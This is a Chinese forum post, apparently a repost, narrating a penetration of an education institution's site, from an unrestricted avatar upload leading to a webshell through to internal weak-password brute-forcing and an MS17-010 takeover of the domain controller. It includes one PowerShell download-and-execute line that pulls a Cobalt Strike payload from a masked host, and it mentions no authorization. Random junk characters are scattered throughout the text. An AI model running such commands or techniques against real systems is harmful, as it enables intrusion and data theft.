找回密码
 立即注册
查看: 2965|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

/ _: {: j# @6 `% ~; d' G3 P: ] 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路2 m( H% E! R, p' B$ L4 C

' A2 [) D6 O$ r* T

" r& W( W2 F# a9 S  : ] c0 a1 ^2 k) [4 `( _0 t0 I

" Y3 @ `* E# `/ ?2 O/ m$ z( R- a

# g% O2 ]+ Q, `7 g 正文 : f; E# B' l% c* U# j- m

5 t, r# s8 Y( R7 g8 d

2 U2 x6 j X) _  $ T4 x- i- P. q, W( g

% {& |9 ]; s h% I; a

1 x- v- X4 U& Y2 [# Q& q 目标:www.xxxx.com(一家教育机构)
8 ]; A/ d6 I5 x2 t' l' H. T5 b2 m7 A
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
, }8 G( }' N" X: {% ~

. M6 S: q$ o% H

" ^% \- s+ @/ L# w' g3 M. n2 J( r2 c vshapes= 5 R) t, H* h5 J7 I4 f

" v4 @4 h; K7 r/ n2 F

8 m5 Z3 o9 L7 u/ ^5 ~ 进行了简单的信息搜集
; q3 F$ I" @0 R4 l: r' C/ g
9 [- R; G4 Z: ^6 t5 N2 K ^5 C0 U; \
! y$ V0 R" B* ?7 O

; _- v( O/ j5 ]: W# C: `$ R

. i; x2 v: C8 @* ^7 [2 @3 q 子域名搜集 * \9 Z& b! t; F# m8 d2 M6 h# b

# U4 p( L; f$ p# ^. W. i- d, t0 S8 p$ ?

8 H/ K3 H* a5 v+ y/ m, y vshapes=4 K D2 Z8 _& [

) L# O: `! X4 `) f' J5 R* H

: Y+ d/ e6 n$ K$ E+ l fofa找资产
3 Y; [5 I+ M, K; d
% }5 E2 I; O2 e0 E* L
% t) a8 `5 Z* k

K$ U7 |) f8 ^# m: S! b9 ` l9 T, ?

* F0 B8 j, F; A+ [, C; s U vshapes=, w' L0 R X% J- |1 e; Y: }

; M* [% W+ i/ [/ n

- p$ a+ H7 e; v+ p 一共七个资产。去重之后只有两个。
0 S" F$ t7 ~+ r/ ]# m+ z
: S% Z0 N2 j5 ^$ Z" C2 }
# J3 T% v+ z# _, E1 d

3 o3 d# o" b r% L3 D0 f! m

0 p% V- \. H$ C. u! Q& X" k* z 目录探测7 r% q1 y, B3 G# H9 h

7 b7 U: d7 p) Z- d' _. m( t

0 F1 n# q$ l9 e& u2 m- I; }! P vshapes= ( T. Q9 R8 N: K2 N' J

$ ?2 a+ Z, e1 \$ Q; [6 U

W3 z4 r+ z7 ^ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
. ~2 x. g2 O+ ~5 [9 G0 _
_% \5 \5 i4 C' E, U
; _: j3 i' i8 K; j5 a

& x+ a( e7 S, ]3 R

# z8 \7 ?$ o( `5 E3 F) m# G 我又尝试了通过修改返回包来绕过登录界面 0 b% Z, `9 I. W

. ~* I0 z6 T5 I+ t& ?4 T5 ~

, b0 H# E* `- X% h/ o vshapes= 1 v, ?" ?' F5 M6 }

. x3 _, `* E' y% J5 [5 `0 F# s

/ X* u# t, C1 Y0 ?, R 还是不行,尝试注入无果 1 @( q, @( }6 e. F' x/ L7 a0 c

6 ^7 F" v# G3 W' o& r

; y9 Y& m' s- S; M3 m6 k: C b vshapes=3 C6 M% O. w2 g, Q

" s" b9 l) M. ]) S4 L5 r/ T6 Y0 Y. m

" @7 r5 P1 ], |7 w$ r+ N+ t# f 不过我目录探测出了一处Spring信息泄露
# f Z$ q8 l1 J O
- X7 X3 k, @4 j$ w" c& k' ~
) E: e$ u. p2 b

* u% H1 v0 `) N

) i5 V9 _& K+ J( ]8 B: ~ vshapes=) m/ j+ p6 @+ j& h, \# X

0 A8 ?4 X6 P8 M& v8 O

1 r3 G' |0 S4 ~9 c4 w! s0 i 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录. G' |6 n/ e! a7 W- [

6 q7 w& ~9 `; Q1 W

8 \5 E, n3 ~1 i/ B) { vshapes= 8 i$ R% P) F! p" T$ N# j* `

6 V+ l: ~% o. A9 I

0 w; T) e4 ~% o; t2 x6 n3 X+ _ 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 & V% {) b$ N" x* ]2 j; b* D; P

- h0 R" U! O; Z* x0 M, y/ _7 D

$ X6 d0 U0 l3 V2 L vshapes=/ n: @" N" _2 G. J4 C( p v

& b2 i3 o1 E0 e# t; g/ d/ {

! K9 ~$ ?9 |9 P" Y 获取有些师傅到这一步就手机抓包电脑测了。$ a( ]* c0 N0 e* f4 ]/ w) V/ j* V

" [5 [4 B% a0 L* ]: y

( N$ G! W* b( X Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。9 ~. B& r# O$ n. J; B

% V1 u- p, }& b, y" D

6 y% q8 O0 `! V6 r 其中在一个公众号发现了小程序,可以进行注册。6 g0 S' r) J% V1 C$ L6 D, X1 e

* F+ X( L) l7 S* |& S

8 w! Z/ p: f4 T$ r 看到了头像上传,尝试上传获取WebShell+ f! H6 ^: A0 N+ O- [

; x# S: g5 N/ ], A- U

7 h0 ]% e1 Y: G2 A8 f vshapes=" s% \ P9 Z2 c' R- w+ i( i

' g, {& h) ^: k/ ?; a

' r6 t: g7 n7 j0 n1 L ] 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 {+ ^# n' w* X2 ?5 P' x( S; M

4 W+ Z% M! S% [

/ ]7 W$ v' k: l2 `% ?# R- s7 T vshapes=, t. p. b. J d5 a6 \: ]

! S9 s! u- J- E9 }

# C, B8 _* t! l$ x% r% T$ Q& { 然后上了大马 - r' s" F. D0 {" S* m" I Y

! m( V) l! S8 x

, A% R" L# {3 k, ~9 { vshapes= * W. g5 b6 B* a, t3 o1 k

* E' O A! K' A% j) _

" D- }7 d/ |# {. ^" h" _ vshapes=# v) W5 U, I6 j

6 ^7 j3 M2 r4 U8 D7 a6 ^" f

1 _$ K- H, q7 Z. Q, z( @7 h4 j 通过翻找文件发现数据库账号密码 ( ?8 o, @' [4 [6 v5 U) i

- ]( p2 F5 j( \( m2 k

" a/ h# N% T2 }3 f K9 W& m vshapes= R0 t$ {' q, ^+ _

) d3 X% w5 B/ Y5 ^" x3 R$ f1 h

% D) |9 e" [) e! J- { --内网渗透% N5 M" t' i* i0 a4 M

9 S5 j3 y/ i! C2 H6 T) x

' p4 y4 D7 h9 z L 直接通过powershell执行 cs上线& ^, s! y$ Z- b

m8 D( L2 b' J. i/ L* u! j$ G

6 b3 p9 m; M8 y% \- }/ O1 Q& t powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" 8 ~" d9 M3 h' ^0 g2 f7 r5 }

' p5 g" X2 Z2 ]! d" [- E3 y+ x

% ~' O* Q, D0 Q7 x: m$ P+ H vshapes=* E7 X v7 X* ?# k% O o& O5 {( q" u

, c* _& s3 D! W k

! j( I7 ~/ Y8 s 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破: @! E# u+ V7 g1 l1 _; [

/ w" W" a- T6 d x0 R' K

; p) z. j# u5 Y" q vshapes=- O6 `1 T# r/ o }1 f& X5 h4 B, V0 K

: p* x' }0 Q5 l0 b. C; v. t- r: r

6 {' o& f4 N) t* @ 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
9 v" }! c$ r7 Q2 j5 c5 K
) Y+ H: o! ~' l: d- w
6 I! A9 P. `& k. M3 L2 b2 U* s
) c! s; a% Y6 t8 l) h

9 @, B0 F1 x7 j5 ~& F* }. t

6 O! B" G5 g! s) X vshapes= ; Z) ~: x5 @/ I6 t/ n7 }+ K

9 }9 ]+ ?. n) q+ v* E% d' o

4 u, A; {) R3 J$ |0 C! k 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
8 V& D' c+ q) ]& }9 g/ V0 x! f0 X
/ @* `) R J9 g1 l3 t% G7 J
0 y, L2 m2 A4 \! a8 j& j" Q; t

G) ^+ o/ Y) {5 K& S

5 R& H+ l( [/ r: B) s- P& I) X vshapes=! _6 v+ x& z/ W* o! b1 x

" {& K9 ?+ H! j3 z3 X

3 L/ M. F4 h: h2 a" ]% Z
' Y- @$ ~& b# e: [
* v5 u# Y+ n9 g3 S/ ^
: Y4 s( J, [( O( Y

% o( q5 L( n$ T$ @: s" U

, \2 d3 k! R+ ?# K, t   : d% T5 U! W! v- Q X! I/ Q- j4 W

( x' _3 Y: P8 I# G2 O# p$ v0 r

6 O- q q! b% M2 J 小结. B7 B g/ c" y2 L: `7 _0 ?+ w& n

# T4 d _6 Z) f5 \4 ~

5 ]5 ~+ q( `6 P$ c  6 B v" i+ U6 ~; s8 D- o) q+ k

% m% l2 T3 d# {4 u8 S- P2 L

, a" x1 v; x. o. {. M# h/ L: A 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! ' O! b8 @0 }1 v5 H, K8 L9 T' M

3 ~% h: a5 {8 ~$ Z7 I; X. p7 C! m3 `

- F. z7 j6 p5 `& z% `  ; E6 T3 i" c9 u0 u% w) ?

0 m1 V/ A7 ^4 h: Z; ~4 M% m1 T
    ; ]0 U- j; R5 R) R
  • + ]6 g# |" b) q! M' H6 ]: O( p   * p6 g* I7 `$ G) n
  • : I. z! u3 t: ~8 h* z" r
  • ! p: Z) k i1 B- Q; f  2 I5 G1 h* D+ w4 [* r9 k- `
  • 9 @! M D) i4 R$ i+ R6 e# ?
2 J5 g7 O- Z+ W4 K$ e

3 l& X, R9 ^5 s3 V, Z 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html1 v, V" u8 o' p% y- z1 x

% ^. N3 J! f5 }4 H! J! ]+ y+ n- }6 q1 _

1 d( l. e1 I K" O# N3 \, R   . l# t/ F+ Y2 O4 Z1 B$ G

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表